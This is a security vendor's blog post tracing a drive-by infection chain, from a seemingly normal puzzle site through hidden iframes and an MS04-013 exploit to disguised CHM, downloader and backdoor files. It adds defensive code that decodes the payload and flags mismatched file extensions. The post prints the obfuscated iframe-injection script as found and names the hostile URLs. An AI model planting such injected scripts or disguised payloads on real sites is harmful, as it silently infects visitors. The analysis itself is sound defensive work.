A Mixed Threat Adventure

Oct 27, 3:44 am (UTC-7)

    Mixed threats are becoming more and more common. Most of the time, users don't even know what hit them until it's too late. Just visit a site, one that REALLY looks legitimate, and presto: you have instant adware, spyware, backdoors, trojans or even worms roaming free and undetected on your system!

    We have reported many examples of what we may call Mixed Threat Adventures, or mal-Adventures, in the past, but here's one current example that is still out there in the wild, so to speak!

    This site, http: //www.freedailyjigsawpuzzles.com/, REALLY just looks like a normal website offering free jigsaw puzzles.




    But by looking at the code of this would-be "Normal Website", I saw this: a JavaScript which is encoded using the escape command.

    // Obfuscated snippet as found on the page (quotes straightened, string split with + so it stays valid JavaScript).
    document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D' +
        '%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C' +
        '%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62' +
        '%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F' +
        '%69%66%72%61%6D%65%3E'));


    which, when unescaped, writes a hidden iframe (width and height both 0) that silently loads another website,
    http://www.pfl-enlarge.com.
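    As an added example (not code from the original post), here is how to decode that escape()-encoded snippet offline and see what the hidden iframe does, instead of letting document.write() render it in a browser. The decoder re-implements the legacy unescape() so the analysis does not depend on the deprecated global; the payload string is the one quoted above, and the function and variable names are my own.

```javascript
// Added example: decode an escape()-encoded document.write payload and
// extract what the embedded iframe does, without executing it.

// The obfuscated string exactly as it appears on the compromised page.
const ESCAPED_PAYLOAD =
  "%3C%69%66%72%61%6D%65%20%73%72%63%3D" +
  "%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C" +
  "%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62" +
  "%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F" +
  "%69%66%72%61%6D%65%3E";

// Re-implementation of the legacy JavaScript unescape():
// %uXXXX -> one UTF-16 code unit, %XX -> one byte, anything else copied through.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Pull every <iframe> out of decoded markup and record its src and size.
// Handles quoted and unquoted attribute syntax (the sample uses both).
function extractIframes(html) {
  const results = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrs = {};
    const attrRe = /([a-zA-Z-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
    let a;
    while ((a = attrRe.exec(tag[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[3] ?? a[4] ?? a[5];
    }
    const w = parseInt(attrs.width ?? "-1", 10);
    const h = parseInt(attrs.height ?? "-1", 10);
    results.push({
      src: attrs.src ?? null,
      width: w,
      height: h,
      // A frame with zero width or height is invisible to the visitor:
      // the classic silent redirect used in this chain.
      hidden: w === 0 || h === 0,
    });
  }
  return results;
}

// Decode the payload and report the iframes it would have written.
function analysePayload(escaped) {
  const decoded = legacyUnescape(escaped);
  return { decoded, iframes: extractIframes(decoded) };
}

console.log(JSON.stringify(analysePayload(ESCAPED_PAYLOAD), null, 2));
```

    Running it prints the decoded markup together with the iframe's src and its width and height; the 0x0 dimensions are what keep the redirect out of the visitor's sight. The decoder also accepts %uXXXX sequences, which the built-in unescape() understands and which later obfuscators use to hide non-ASCII characters.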

    This website in turn loads another site, http://www.britroadsters.com, again through a hidden iframe.

    The http://www.britroadsters.com site checks which browser is in use. If the browser is "Microsoft Internet Explorer" it loads the file enter.php; otherwise it loads the file all.php. It doesn't really matter, though, since both files just load yet another website through a hidden iframe, which leads to
    http://www.secretadvise.biz/news.html.

    Hehe… In the words of my TL, this is just like following the bouncing ball of malware.

    So on the site http://www.secretadvise.biz/news.html, which really is an "evil" site, there is another JavaScript (again encoded with the escape command) that exploits the Microsoft HTML Help Vulnerability (MS04-013) and ultimately downloads and executes a file named
    "Style.css".

    Here is an image of the decoded script from news.html.



    Voila! The exploit code can now be seen… and a mysterious Style.css file…

    From website links, we now move on to the files downloaded.

    Don't be fooled by the extension: Style.css is actually a CHM (compiled HTML Help) file, which drops an executable named open.exe. There, now we're getting somewhere! :) hehe.. But that's not where it ends…

    The file open.exe is itself just a downloader; it fetches a file from
    http://www.secretadvise.biz/girl.bmp. And this "bmp" file is, hold your horses, a backdoor!
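    The "wrong extension" trick used twice in this chain (a CHM served as Style.css, a backdoor served as girl.bmp) is caught by looking at a file's leading bytes rather than trusting its name. The following is an added example, not part of the original post. The magic values (ITSF for compiled HTML Help, MZ for a DOS/PE executable, BM for a Windows bitmap, the PNG signature) are real; the sample buffers are constructed stand-ins for the files in the post and assume girl.bmp is a PE executable, which the post does not state. Function names are my own.

```javascript
// Added example: classify a downloaded file by its magic bytes and flag
// any mismatch with what the extension promises.

// Real file signatures (first bytes of the file).
const MAGIC = [
  { type: "chm", bytes: [0x49, 0x54, 0x53, 0x46] },        // "ITSF": compiled HTML Help
  { type: "pe",  bytes: [0x4d, 0x5a] },                    // "MZ": DOS/PE executable
  { type: "bmp", bytes: [0x42, 0x4d] },                    // "BM": Windows bitmap
  { type: "png", bytes: [0x89, 0x50, 0x4e, 0x47] },        // PNG signature
];

// Which content types each extension is allowed to carry.
const EXPECTED_BY_EXT = {
  css: ["text"],
  bmp: ["bmp"],
  exe: ["pe"],
  chm: ["chm"],
  png: ["png"],
};

function startsWith(buf, bytes) {
  if (buf.length < bytes.length) return false;
  return bytes.every((b, i) => buf[i] === b);
}

// Crude text check: printable ASCII plus tab/CR/LF in the first 512 bytes.
function isPrintableText(buf) {
  const n = Math.min(buf.length, 512);
  for (let i = 0; i < n; i++) {
    const c = buf[i];
    if (c === 0x09 || c === 0x0a || c === 0x0d) continue;
    if (c < 0x20 || c > 0x7e) return false;
  }
  return n > 0;
}

// Returns the type implied by the bytes, never by the name.
function sniffType(buf) {
  for (const m of MAGIC) if (startsWith(buf, m.bytes)) return m.type;
  return isPrintableText(buf) ? "text" : "unknown";
}

// Compare the sniffed type with what the extension claims.
function checkDownload(name, buf) {
  const ext = (name.split(".").pop() || "").toLowerCase();
  const actual = sniffType(buf);
  const expected = EXPECTED_BY_EXT[ext];
  const mismatch = expected !== undefined && !expected.includes(actual);
  return { name, ext, actual, mismatch };
}

// Constructed samples (only the leading bytes matter for this check).
// "Style.css" and "girl.bmp" mimic the chain in the post; girl.bmp as a PE is an assumption.
const enc = new TextEncoder();
const SAMPLES = {
  "Style.css": Uint8Array.from([0x49, 0x54, 0x53, 0x46, 0x03, 0x00, 0x00, 0x00]),
  "girl.bmp":  Uint8Array.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00]),
  "real.css":  enc.encode("body { margin: 0; }\n"),
  "real.bmp":  Uint8Array.from([0x42, 0x4d, 0x36, 0x00, 0x00, 0x00]),
};

function scanSamples(samples = SAMPLES) {
  return Object.entries(samples).map(([name, buf]) => checkDownload(name, buf));
}

for (const r of scanSamples()) {
  console.log(`${r.name}: looks like ${r.actual}${r.mismatch ? "  <-- extension mismatch" : ""}`);
}
```

    Only the two masquerading files are flagged; the genuine CSS and bitmap pass. In a real gateway or endpoint check the same comparison runs on the first few hundred bytes of the download, before the browser or HTML Help ever gets to open it.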

    The files have been sent to the service team for signature generation, and here's the reply. The files will be detected as follows:

    News.html (1,998 bytes) – JS_WONKA.B
    Style.css (13,016 bytes) – CHM_DROPPER.CN
    Open.exe (2,608 bytes) – TROJ_DLOADER.AJH
    Girl.bmp (50,920 bytes) – BKDR_HAXDOOR.CT

    So let us review: just by visiting a site, a seemingly normal and non-malicious site, the system gets infected with four pieces of malware. Plus there's the added bonus of a malicious user being able to get into your system thanks to BKDR_HAXDOOR.CT!

    So for the Net-surfers out there, just keep in mind which sites you visit. And of course it's always a good thing to have your systems patched and your pattern files updated. :)





    © Copyright 2011 Trend Micro Inc. All rights reserved.